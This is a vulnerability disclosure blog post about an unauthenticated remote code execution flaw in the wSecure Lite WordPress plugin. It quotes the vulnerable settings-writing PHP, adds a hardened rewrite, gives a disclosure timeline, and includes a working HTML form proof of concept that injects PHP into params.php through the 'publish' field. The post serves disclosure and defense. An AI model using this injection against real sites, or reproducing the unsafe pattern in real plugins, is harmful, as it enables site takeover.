12 Jul

Remote Code Execution (RCE) Vulnerability in wSecure Lite

We recently disclosed a minor, but very obvious, vulnerability in a WordPress plugin for logging user activity. What we found kind of stunning about this was that the developer of the plugin was a WordPress security company that claimed to “specialize” in doing security reviews of plugins. We later got an email from someone at the company who seemed to be surprised that we would have a negative view of the security industry. We have a hard time believing that someone who actually cares about security and sees what is going on would not have such a view, considering how bad things are. We recently found another reminder of that from a security plugin with an incredibly serious vulnerability.

wSecure Lite is a plugin that makes it so that visiting the normal URLs to log in to the WordPress admin area does not work and instead you have to visit a special URL to log in (as the name suggests, there is also a paid version of the plugin). That isn’t something that really provides you much protection, as the only thing the average website needs to do in regards to login security is use a strong password. In this case though, using this plugin opened you up to a remote code execution (RCE) vulnerability, which would allow a hacker to do just about anything on a website.

One of the ways we try to make sure we provide our customers with the best data on vulnerabilities in WordPress plugins is by monitoring them for hacking attempts. Starting in May this caused us to begin finding very exploitable vulnerabilities in the current version of numerous plugins. As the vulnerabilities began to pile up we got interested in seeing if we could find additional data on what plugins hackers were interested in, to see if we could improve our ability to catch this type of issue. That led us to finding such a request for a file in wSecure Lite, /wp-content/plugins/wsecure/wsecure-config.php, back in February.

Looking at that file it took hardly any time to spot a very serious issue. The file handles generating the plugin’s settings page, so it should only be accessible to Administrator level users, but it can be accessed directly (inexplicably, it is also accessible by Contributor level and above users in the admin area as well). That access allows anyone to change the plugin’s settings, meaning it would be easy for someone to disable the security provided by the plugin, but more importantly it also allows writing arbitrary code to a .php file through this piece of the code:

    $WSecureConfig = new WSecureConfig();
    $newkey = $_POST["key"]=="" ? $WSecureConfig->key : md5(base64_encode($_POST["key"])) ;
    $string = '<?php class WSecureConfig { var $publish = "'. $_POST["publish"]. '"; var $passkeytype = "'. $_POST["passkeytype"] . '"; var $key = "'. $newkey . '"; var $options = "'. $_POST["options"]. '"; var $custom_path = "'. $_POST["custom_path"]. '"; } ?>';
    if (is_writable(dirname(__FILE__).'/params.php'))
        $fp = fopen(dirname(__FILE__).'/params.php', "w+");
        fwrite($fp, $string);

Using that, an attacker can place malicious code in the file /wp-content/plugins/wsecure/params.php and then run it by requesting that file.
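For comparison, here is how the same settings write could be done safely. This is an added example, not code from wSecure Lite or its developer; the function name, option name, nonce action and the accepted values for publish and passkeytype are assumptions made for illustration, and it assumes it runs inside WordPress.

```php
<?php
// Added example (not the plugin's code): a hardened version of the settings
// writer above. Names marked "assumed" are illustration-only.

// The original file could be requested directly from /wp-content/plugins/wsecure/.
// Refuse to run unless loaded through WordPress.
if (!defined('ABSPATH')) {
    exit;
}

function wsecure_example_save_settings(array $post): bool {  // assumed name
    // 1. Authorization: only administrators may change security settings.
    if (!current_user_can('manage_options')) {
        return false;
    }
    // 2. CSRF protection: nonce tied to this action (assumed action name).
    check_admin_referer('wsecure_example_update');

    // 3. Validate every field against an allow-list instead of trusting $_POST.
    //    Accepted values are assumed; the original took them verbatim.
    $publish     = ($post['publish'] ?? '0') === '1' ? '1' : '0';
    $passkeytype = sanitize_key($post['passkeytype'] ?? '');
    $settings = [
        'publish'     => $publish,
        'passkeytype' => $passkeytype,
        'options'     => sanitize_text_field($post['options'] ?? ''),
        'custom_path' => sanitize_title($post['custom_path'] ?? ''),
    ];
    if (($post['key'] ?? '') !== '') {
        // Derive a key as the original did, but with a current hash instead of md5.
        $settings['key'] = hash('sha256', (string) $post['key']);
    }

    // 4. Store settings as data in the options table, never as a generated
    //    .php file, so user input can never become executable code.
    return update_option('wsecure_example_settings', $settings);  // assumed option
}
```

Even with the original file-writing design, steps 1 and 2 alone would have stopped the direct-access exploitation described above; step 4 removes the code-execution sink entirely.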

Proof of Concept

The following proof of concept will cause the file /wp-content/plugins/wsecure/params.php to display the message “Hello, world.”.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-content/plugins/wsecure/wsecure-config.php" method="POST">
<input type="hidden" name="wsecure_action" value="update" />
<input type="hidden" name="publish" value='";} echo "Hello, world."; class WSecureConfig2 {var $test="' />
<input type="submit" value="Submit" />
</form>


  • 7/5/2016 – Developer notified.
  • 7/12/2016 – WordPress.org Plugin Directory notified.
  • 8/2/2016 – Version 2.4 released, which fixes the vulnerability.
